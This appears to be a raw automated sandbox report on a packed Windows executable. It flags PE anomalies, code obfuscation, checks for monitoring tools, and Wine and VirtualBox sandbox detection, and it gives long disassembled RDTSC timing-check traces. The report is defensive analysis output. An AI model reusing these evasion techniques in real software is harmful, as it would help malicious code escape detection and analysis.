Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: jSFUzuYPG9.exe

Static file information: File size 2870272 > 1048576

Source: jSFUzuYPG9.exe

Static PE information: Raw size of trstwfmm is bigger than: 0x100000 < 0x294c00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Unpacked PE file: 0.2.jSFUzuYPG9.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: jSFUzuYPG9.exe

Static PE information: real checksum: 0x2c69ff should be: 0x2c313f

PE file contains sections with non-standard names

Source: jSFUzuYPG9.exe	Static PE information: section name:
Source: jSFUzuYPG9.exe	Static PE information: section name: .rsrc
Source: jSFUzuYPG9.exe	Static PE information: section name: .idata
Source: jSFUzuYPG9.exe	Static PE information: section name: trstwfmm
Source: jSFUzuYPG9.exe	Static PE information: section name: ekycdelp
Source: jSFUzuYPG9.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016ACE40 pushad ; iretd	0_3_016ACE41
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD158 pushad ; iretd	0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD158 pushad ; iretd	0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD158 pushad ; iretd	0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016ACE55 pushad ; iretd	0_3_016ACE59
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016ACE10 pushad ; iretd	0_3_016ACE11
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD0E0 pushad ; iretd	0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD0E0 pushad ; iretd	0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD0E0 pushad ; iretd	0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD2D8 pushad ; iretd	0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD2D8 pushad ; iretd	0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD2D8 pushad ; iretd	0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AFA8F push 00000001h; iretd	0_3_016AFAA0
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AFA81 push 00000001h; iretd	0_3_016AFAA0
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AFA81 push 00000001h; iretd	0_3_016AFAA0

Source: jSFUzuYPG9.exe

Static PE information: section name: entropy: 7.9813529381203026

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1EC32 second address: E1EC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1EC45 second address: E1EC7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F4BA0D3F156h 0x00000015 jl 00007F4BA0D3F156h 0x0000001b jnl 00007F4BA0D3F156h 0x00000021 popad 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0A7EC second address: E0A7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0A7F7 second address: E0A7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1DD01 second address: E1DD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1DD07 second address: E1DD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1DD0B second address: E1DD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21984 second address: E2198F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4BA0D3F156h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21A96 second address: E21AA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21AA0 second address: E21AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 6CC0A04Eh 0x0000000d xor dx, E4B5h 0x00000012 lea ebx, dword ptr [ebp+1244D8BCh] 0x00000018 mov dword ptr [ebp+122D1F3Dh], ebx 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F4BA0D3F166h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21BFC second address: E21C0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21C0D second address: E21C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21C11 second address: E21C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21C17 second address: E21C35 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F4BA0D3F156h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21D76 second address: E21E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jnc 00007F4BA0D3970Ch 0x0000000c mov dword ptr [ebp+122D1D21h], ebx 0x00000012 push 00000003h 0x00000014 mov cx, C149h 0x00000018 mov dword ptr [ebp+122D280Dh], esi 0x0000001e push 00000000h 0x00000020 js 00007F4BA0D39709h 0x00000026 sub dl, FFFFFFFAh 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D27FCh], eax 0x00000031 push 8051659Fh 0x00000036 jmp 00007F4BA0D3970Bh 0x0000003b add dword ptr [esp], 3FAE9A61h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F4BA0D39708h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c mov dl, 24h 0x0000005e ja 00007F4BA0D3970Ah 0x00000064 call 00007F4BA0D39714h 0x00000069 and edx, dword ptr [ebp+122D2C57h] 0x0000006f pop edi 0x00000070 lea ebx, dword ptr [ebp+1244D8D0h] 0x00000076 jns 00007F4BA0D3970Ch 0x0000007c xchg eax, ebx 0x0000007d push edx 0x0000007e jmp 00007F4BA0D39717h 0x00000083 pop edx 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jne 00007F4BA0D39716h 0x0000008d jmp 00007F4BA0D39710h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21E4B second address: E21E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17F96 second address: E17FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39717h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17FB4 second address: E17FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D3F156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17FC0 second address: E17FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4BA0D3970Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17FD7 second address: E17FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3FBAA second address: E3FBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3FFEF second address: E3FFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3FFF3 second address: E3FFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E406BB second address: E406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E406C1 second address: E406E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4BA0D39706h 0x0000000a jnl 00007F4BA0D39706h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D3970Fh 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E406E5 second address: E4070D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a jno 00007F4BA0D3F167h 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3576D second address: E35771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E35771 second address: E35775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E40A04 second address: E40A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39714h 0x00000007 pushad 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E40A3E second address: E40A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E410F9 second address: E410FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E413E5 second address: E413EF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E413EF second address: E41413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F4BA0D39714h 0x0000000d push esi 0x0000000e jl 00007F4BA0D39706h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E19BCE second address: E19BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4BA0D3F15Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E47B58 second address: E47B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E47F21 second address: E47F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CEA8 second address: E4CEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CEB0 second address: E4CEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CEBC second address: E4CEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E16412 second address: E16425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4BA0D3F15Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C462 second address: E4C47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 jp 00007F4BA0D39706h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C606 second address: E4C622 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F158h 0x00000008 jmp 00007F4BA0D3F15Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
